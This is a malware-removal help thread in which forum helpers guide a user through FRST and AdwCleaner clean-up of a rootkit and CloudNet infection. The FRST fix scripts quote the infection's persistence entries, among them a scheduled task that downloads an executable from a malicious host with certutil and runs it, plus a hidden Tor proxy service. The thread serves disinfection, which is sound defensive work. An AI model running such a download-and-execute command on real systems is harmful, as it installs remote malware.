Jang9

CLOSED HELP! Rootkit and Cloudnet virus

Recommended Posts

I have this impossible-to-delete-without-damage-your-cmp Rootkit problem and I don't know if it's this Cloudnet malware. I cannot access to windows defender, too, I tried many manually things. Ah, when I run an EEK scan after the results an 'Activate EEK protection' download pop up but then its says that's something wrong

 

scan_180605-154342.txt

Addition_05-06-2018 15.51.50.txt

FRST_05-06-2018 15.51.50.txt

Share this post


Link to post
Share on other sites

Jamg9,

I see a few things that do need to be taken care of. In short, your machine was infected yes; but it still is. The first and most major step is killing the most invasive infection on the computer, and the one responsible for our program not installing properly: SmartService.

Please read through these instructions before starting. If you think you can handle all this, move forward. If you don't, please get someone involved who can.

SmartService IS possible to remove, and for someone savvy enough, actually pretty easy. For most people though, SmartService is a pretty big pain to remove. Do you have access to a clean, uninfected Windows 10 machine? If you do, we can use the recovery environment of a Windows 10 installation USB stick (8GB or larger, you'll need one of those too) to get rid of it.

Things to consider:
1. SmartService disables recovery mode in Windows 10, so we have to make a recovery boot USB stick from a clean computer, and configure the infected computer to boot from it.
2. SmartService knows how to patch FRST64.exe so it will not run in recovery mode, so we must make sure SmartService never 'sees' the FRST64.exe program used for this next set of steps.
3. If regular Windows boots while either the Windows 10 recovery USB stick or the FRST USB stick are inserted, you need to format the USB stick and start over. It is safe to format it using the clean computer.

How savvy are you with such things? Here's what to do:

1. Create a Windows 10 recovery USB stick: https://www.techrepublic.com/article/be-prepared-create-a-windows-10-recovery-drive/
2. Using the clean machine, download a fresh copy of FRST64.exe that has never touched the 'sick' machine, and copy it to a separate USB stick. DO NOT INSERT THE USB STICK INTO THE 'SICK' MACHINE YET.
3. Once you're ready with the USB stick and the Windows 10 recovery USB stick (yes, two sticks), shut down the sick computer completely. As in shut down power off. Follow the instructions here to boot from the Windows 10 recovery USB stick: https://craftedflash.com/info/how-boot-computer-from-usb-flash-drive
4. Use the Repair -> Troubleshoot -> Command Prompt option within recovery mode. Once there, plug in the second USB stick that has FRST64 on it. Find your USB drive by running notepad.exe, clicking File->Open, then noting which drive says "Boot". Normally that is D: or E:, depending on how many drives are in your machine.  Either way, we're looking for the USB stick drive letter. You can also find it by typing (in the command prompt) "dir d:", "dir e:" etc. until you find the FRST64.exe program you downloaded earlier.
5. Type "FRST64" to run it. Click the Scan button. Please send the FRST.txt file that it creates. If all goes well, FRST64 will have killed the SmartService driver, and you'll be able to reboot into normal mode where we can finish the removal.

If these instructions are too much, it may be better to get someone involved who has enough experience to do it - while this is not an inherently dangerous exercise, it's not exactly for the faint of heart.

Until SmartService is killed, nothing we do on this machine is going to work properly in way of getting rid of malware.

Share this post


Link to post
Share on other sites

OK, restart to normal mode and run a fresh scan with FRST.  Attach the new FRSTscan report to your reply.

Share this post


Link to post
Share on other sites

Please run FRST again. Next, select and copy the following text, including the words Start:: and End::. Switch back to the FRST program window, and click the Fix button. It should read the fix directly from the clipboard and run the fix. When it is finished, please attach the fixlog.txt file it created in the same folder the FRST program is in.

Start::
    HKLM\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\app.ex
    HKLM-x32\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\app.ex
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [CHGLut61UO.exe] => C:\Program Files\HP\0KJNXAMZV\CHGLut61UO.exe
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [1YSTTJ7UVGN1NM0] => "C:\Program Files\JRGW4ZQGZV\JRGW4ZQGZ.exe"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [VI5IY2IIMOR4850] => "C:\Program Files (x86)\cyjrr1tb5ol\S2L8Q.exe"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [WinterWind] => C:\Windows\rss\csrss.exe [3189248 2018-06-03] () <==== ATTENTION
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [5364211] => "C:\Users\lulul\AppData\Roaming\xnsclsxytt2\sqjeg5z1rnp.exe" /VERYSILENT
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [C2G22IOHT0D7RM2] => "C:\Program Files\7GAONO7TA5\7GAONO7TA.exe"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [CloudNet] => C:\Users\lulul\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-11] (EpicNet Inc.) <==== ATTENTION
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
    AppInit_DLLs: C:\ProgramData\AppriabuS\Fresh-Find.dll => No File
    AppInit_DLLs-x32: C:\ProgramData\AppriabuS\Unolam.dll => No File
    ShellExecuteHooks: No Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\system32\mcicda64.dll -> No File <==== ATTENTION
    GroupPolicy: Restriction ? <==== ATTENTION
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYgxQ6nGkfirS7xmUcGkGorXFDM9Gdp24H7dk068pRXKjB-g5zpzX8dEn-Vxy0dln1uCduxae-vo_TU2-gQaFO4Q4REqoRml1EB2QaNLgcA8jQIoAmQkkNxsDYpbzqWu6P3OVbnemRNuGR0LYB-rc7hlRWrkglNqkTaujVyonWvAQ,,&q={searchTerms}
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYgxQ6nGkfirS7xmUcGkGorXFDM9Gdp24H7dk068pRXKjB-g5zpzX8dEn-Vxy0dln1uCduxae-vo_TU14WfVorckhuLcB4ERczoSMs6EyQ5G-F7KoxaK-pyuUPUjLpWgjFYU5hsBNxPFw53uJR6yzNTbR_94KGtcDRnkpm9dnT6wA,,
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYgxQ6nGkfirS7xmUcGkGorXFDM9Gdp24H7dk068pRXKjB-g5zpzX8dEn-Vxy0dln1uCduxae-vo_TU2-gQaFO4Q4REqoRml1EB2QaNLgcA8jQIoAmQkkNxsDYpbzqWu6P3OVbnemRNuGR0LYB-rc7hlRWrkglNqkTaujVyonWvAQ,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-2635990016-3569543676-633003942-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYgxQ6nGkfirS7xmUcGkGorXFDM9Gdp24H7dk068pRXKjB-g5zpzX8dEn-Vxy0dln1uCduxae-vo_TU2-gQaFO4Q4REqoRml1EB2QaNLgcA8jQIoAmQkkNxsDYpbzqWu6P3OVbnemRNuGR0LYB-rc7hlRWrkglNqkTaujVyonWvAQ,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-2635990016-3569543676-633003942-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYgxQ6nGkfirS7xmUcGkGorXFDM9Gdp24H7dk068pRXKjB-g5zpzX8dEn-Vxy0dln1uCduxae-vo_TU2-gQaFO4Q4REqoRml1EB2QaNLgcA8jQIoAmQkkNxsDYpbzqWu6P3OVbnemRNuGR0LYB-rc7hlRWrkglNqkTaujVyonWvAQ,,&q={searchTerms}
    S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64x.exe [593920 2018-06-07] (SystemaRev) [File not signed] <==== ATTENTION
    R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
    S2 73817c8d47bae36ed906fa532617a2eb; rundll32.exe C:\Windows\zeweuslocxykzkso.zewe qBeJW [X]
    S2 a2b51fb0966f086f096c4a3ca96428e4; C:\Program Files\a2b51fb0966f086f096c4a3ca96428e4\dda09f7047d145f492dd2329a91b1425.exe [X]
    S2 AppriabuS; C:\ProgramData\\AppriabuS\\AppriabuS.exe shuz -f "C:\ProgramData\\AppriabuS\\AppriabuS.dat" -l -a
    S2 backlh; C:\ProgramData\Logic Cramble\set.exe [X] <==== ATTENTION
    S2 dahkService; C:\ProgramData\dahkService\dahkService.exe -s 25 [X]
    S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ATTENTION
    S2 saiyitechnology; C:\ProgramData\yahoochrome_D\desktop46.exe [X]
    R2 TCPSvc; "C:\Users\lulul\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\lulul\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\lulul\AppData\Local\Temp\csrss\proxy\t" <==== ATTENTION
    R1 52062e3be9a45d6ecc7f5f83ba955418; C:\Windows\System32\drivers\52062e3be9a45d6ecc7f5f83ba955418.sys [211632 2018-06-02] ()
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zero byte File/Folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-06-03] () [File not signed] <==== ATTENTION
    S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
    S1 zpxlegso; \??\C:\Windows\system32\drivers\zpxlegso.sys [X]
    2018-06-04 00:00 - 2018-06-04 00:00 - 000000000 ____D C:\ProgramData\SystemaRev
    2018-06-03 22:11 - 2018-06-03 22:11 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2018-06-03 22:10 - 2018-06-11 18:14 - 000003270 _____ C:\Windows\System32\Tasks\csrss
    2018-06-03 22:10 - 2018-06-03 22:10 - 000003674 _____ C:\Windows\System32\Tasks\FastDataX Task
    2018-06-03 22:09 - 2018-06-09 21:20 - 000003878 _____ C:\Windows\System32\Tasks\MainPMgr
    2018-06-03 22:09 - 2018-06-03 22:09 - 000000000 ____D C:\Program Files\SystemaRev
    2018-06-03 22:07 - 2018-06-03 22:08 - 000000000 ____D C:\Users\lulul\AppData\Local\55939425818d4a94a6f77851d1cab5f0
    2018-06-03 22:06 - 2018-06-04 00:22 - 000000000 ____D C:\ProgramData\dahkService
    2018-06-03 22:06 - 2018-06-04 00:22 - 000000000 ____D C:\Program Files (x86)\cyjrr1tb5ol
    2018-06-03 22:05 - 2018-06-04 00:20 - 000000000 ____D C:\Program Files (x86)\XXCCXXC
    2018-06-02 02:25 - 2018-06-02 02:25 - 001890304 _____ C:\Windows\e61fc1e00dd30cf136e6f36c52e8653a.exe
    2018-06-02 02:25 - 2018-06-02 02:25 - 000211632 _____ C:\Windows\system32\Drivers\52062e3be9a45d6ecc7f5f83ba955418.sys
    2018-06-01 12:18 - 2018-06-01 12:38 - 000000000 ____D C:\ProgramData\KMSAutoS
    2018-06-03 22:12 - 2018-06-03 22:12 - 007627776 _____ () C:\Users\lulul\AppData\Local\agent.dat
    2018-06-03 22:12 - 2018-06-03 22:12 - 000070896 _____ () C:\Users\lulul\AppData\Local\Config.xml
    1601-01-03 21:33 - 1601-01-03 21:33 - 000058368 ____N (Microsoft Corporation) C:\Users\lulul\AppData\Local\IbQYMoznH.exe
    1601-01-03 21:33 - 1601-01-03 21:33 - 000180736 ____N (Microsoft Corporation) C:\Users\lulul\AppData\Local\igsIGLuiFo.exe
    2018-06-03 22:10 - 2018-06-03 22:13 - 000016080 _____ () C:\Users\lulul\AppData\Local\InstallationConfiguration.xml
    2018-06-03 22:10 - 2018-06-03 22:10 - 000140800 _____ () C:\Users\lulul\AppData\Local\installer.dat
    2018-06-03 22:12 - 2018-06-03 22:12 - 000005568 _____ () C:\Users\lulul\AppData\Local\md.xml
    2018-06-03 22:12 - 2018-06-03 22:12 - 000126464 _____ () C:\Users\lulul\AppData\Local\noah.dat
    2018-06-03 22:10 - 2018-06-03 23:49 - 000929792 _____ () C:\Users\lulul\AppData\Local\sham.db
    2018-06-03 22:12 - 2018-06-03 22:12 - 001989159 _____ () C:\Users\lulul\AppData\Local\SunHold.tst
    2018-06-03 22:13 - 2018-06-03 22:13 - 001895383 _____ () C:\Users\lulul\AppData\Local\Trustfind.bin
    2018-06-03 22:13 - 2018-06-03 22:13 - 000032038 _____ () C:\Users\lulul\AppData\Local\uninstall_temp.ico
    2018-06-03 22:06 - 2018-06-03 22:06 - 000000003 _____ () C:\Users\lulul\AppData\Local\wbem.ini
    C:\Windows\rss\csrss.exe
    C:\Users\lulul\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    2018-06-03 22:10 - 2018-06-03 22:48 - 001527488 _____ (Microsoft Corporation) C:\Users\lulul\AppData\Local\Temp\dbghelp.dll
    2018-06-03 22:05 - 2018-06-03 22:09 - 013205167 _____ (MAL                                                         ) C:\Users\lulul\AppData\Local\Temp\gkabxtkbcbs.exe
    2018-06-03 22:04 - 2018-06-03 22:04 - 001794678 _____ () C:\Users\lulul\AppData\Local\Temp\nozama-bn.exe
    2018-06-03 22:05 - 2018-06-03 22:06 - 000549100 _____ (ZRFXRD                                                      ) C:\Users\lulul\AppData\Local\Temp\Package.exe
    2018-06-03 22:08 - 2018-06-03 22:09 - 007204868 _____ () C:\Users\lulul\AppData\Local\Temp\s2s.exe
    2018-06-03 22:05 - 2018-06-03 22:05 - 000793109 _____ (                                                            ) C:\Users\lulul\AppData\Local\Temp\setup.exe
    2018-06-03 22:07 - 2018-06-03 22:07 - 000775144 _____ (                                                            ) C:\Users\lulul\AppData\Local\Temp\setupAB.exe
    2018-06-03 22:10 - 2018-06-03 22:48 - 000167616 _____ (Microsoft Corporation) C:\Users\lulul\AppData\Local\Temp\symsrv.dll
    2018-06-03 22:05 - 2018-06-03 22:06 - 004510058 _____ (TigerTrade                                                  ) C:\Users\lulul\AppData\Local\Temp\TradeSetup_upd.exe
    2018-06-03 22:11 - 2018-06-03 22:07 - 000099900 _____ () C:\Users\lulul\AppData\Local\Temp\Uninstall.exe
    2018-06-03 22:09 - 2018-06-03 22:10 - 001131341 _____ (                                                            ) C:\Users\lulul\AppData\Local\Temp\whiteclick.exe
    ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll -> No File
    ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
    Task: {049D6DCB-A3E3-4CE2-B5AF-9297B2569BCD} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-03] () <==== ATTENTION
    Task: {4B3EE964-F2E9-4EFC-B21B-F3E657626200} - System32\Tasks\Facebook Copy => C:\Windows\system32\rundll32.exe "C:\Program Files\Facebook Copy\Facebook Copy.dll",GpbvrpVqXa <==== ATTENTION
    Task: {4B71A3A5-5981-4241-A982-B1E8D44001B5} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
    Task: {77CD6A86-0A40-437B-BC21-720508E831C4} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/3/app.exe C:\Users\lulul\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\lulul\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    Task: {817BDCF4-A6D3-4C7A-ACC0-780E3758F755} - \{28107D1D-247D-62BA-0EDF-56524BEBB675} -> No File <==== ATTENTION
    Task: {95E41B1F-0172-48F9-ADA1-9A1314ADF365} - System32\Tasks\Update_4.0.8 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64x.exe [2018-06-07] (SystemaRev)
    Task: {B6AC6AC4-E69A-4FB1-81CB-1A33779BF624} - \{CF77D1E3-BD61-9033-E7A8-85E6382DB3EE} -> No File <==== ATTENTION
    Task: {DC67DBC4-2AB8-47E2-9F2F-4CBA02184514} - System32\Tasks\FastDataX Task => C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE
    Task: C:\Windows\Tasks\Facebook Copy.job => rundll32.exe  C:\Program Files\Facebook Copy\Facebook Copy.dll
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\StartupApproved\Run: => "C2G22IOHT0D7RM2"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\StartupApproved\Run: => "CloudNet"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\StartupApproved\Run: => "1YSTTJ7UVGN1NM0"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\StartupApproved\Run: => "CHGLut61UO.exe"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\StartupApproved\Run: => "VI5IY2IIMOR4850"
    HKU\S-1-5-21-2635990016-3569543676-633003942-1001\...\StartupApproved\Run: => "5364211"
    FirewallRules: [{DE8F2A9B-AD3F-48EA-8948-275E3353190D}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{05B05F2F-8506-4E5E-B9DA-92598BFE782D}] => (Allow) C:\Program Files\SystemaRev\RevServicesX\app.exe
    FirewallRules: [{615AC2F4-506F-428A-91F6-6629AB1AAAE1}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{4E1DD3E2-8DED-41DE-A9FC-794AA2243CCC}] => (Allow) C:\Users\lulul\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
End::

Share this post


Link to post
Share on other sites

That is good news.

Based on what was removed, I would like for you to run a third-party tool that targets Adware & Junkware in general.  Just to make sure we did not miss anything.

Please download AdwCleaner and save it on your desktop.

  1. Close all open programs and Internet browsers (you may want to print out or write down these instructions first).
  2. Double click on the AdwCleaner icon to run it.
  3. You will need to accept the license agreement from Malwarebytes in order to continue.
  4. Click on the Scan button in the lower-left.
  5. When the scan is done, a log will open in Notepad. You can close this Notepad window before continuing.
  6. If something was found on your computer, then click on the Clean button in the lower-left (where the "Scan" button was earlier).
  7. AdwCleaner will warn you that it will close all running processes (programs). Click OK to continue when ready.
  8. After the cleaning process is done, you will be prompted to restart your computer. Please click Reboot now when ready to restart your computer.
  9. A text file will open in Notepad after the restart (this is the log of what was removed), which you can save on your desktop.
  10. Please attach that log file to a reply for me to review.
  11. If you lose that log file for any reason, you can find it at C:\AdwCleaner[C0] on your computer.

Share this post


Link to post
Share on other sites

Let's take a fresh look.

Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply.

Be sure to let me know how things are running.

Share this post


Link to post
Share on other sites

Just to be safe.

Please run FRST again. Next, select and copy the following text, including the words Start:: and End::. Switch back to the FRST program window, and click the Fix button. It should read the fix directly from the clipboard and run the fix. When it is finished, please attach the fixlog.txt file it created in the same folder the FRST program is in.

Start::
    C:\Users\lulul\AppData\Local\Temp\dPXvJLk3U
    C:\Users\lulul\AppData\Local\Temp\nsb39.tmp
    C:\Users\lulul\AppData\Local\Temp\nsoFA2B.tmp
End::

Share this post


Link to post
Share on other sites

Let's take a fresh look.

Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply.

Be sure to let me know how things are running.

Share this post


Link to post
Share on other sites

Your system is missing the  Security Update for Microsoft Windows SMB Server (4013389)

See: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

Please run FRST again. Next, select and copy the following text, including the words Start:: and End::. Switch back to the FRST program window, and click the Fix button. It should read the fix directly from the clipboard and run the fix. When it is finished, please attach the fixlog.txt file it created in the same folder the FRST program is in.

Start::
    2018-06-19 11:34 - 2018-06-19 11:34 - 000079736 _____ (AppWork GmbH) C:\Users\lulul\AppData\Local\Temp\131739032469074620.exe
    2018-06-19 11:41 - 2018-06-19 11:41 - 000035680 _____ () C:\Users\lulul\AppData\Local\Temp\i4jdel0.exe
    2018-06-19 11:37 - 2018-06-19 11:37 - 000040448 ____N () C:\Users\lulul\AppData\Local\Temp\proxy_vole6271394519320748616.dll
    2018-06-19 11:41 - 2018-06-19 11:41 - 000040448 _____ () C:\Users\lulul\AppData\Local\Temp\proxy_vole7123844085149714122.dll
End::

Share this post


Link to post
Share on other sites

Let's see how well that worked.

Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply.

Be sure to let me know how things are running.

Share this post


Link to post
Share on other sites

The copy of Windows 10 on this system is horribly out of date.  Why are you not keeping it updated?

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.

  • Recently Browsing   0 members

    No registered users viewing this page.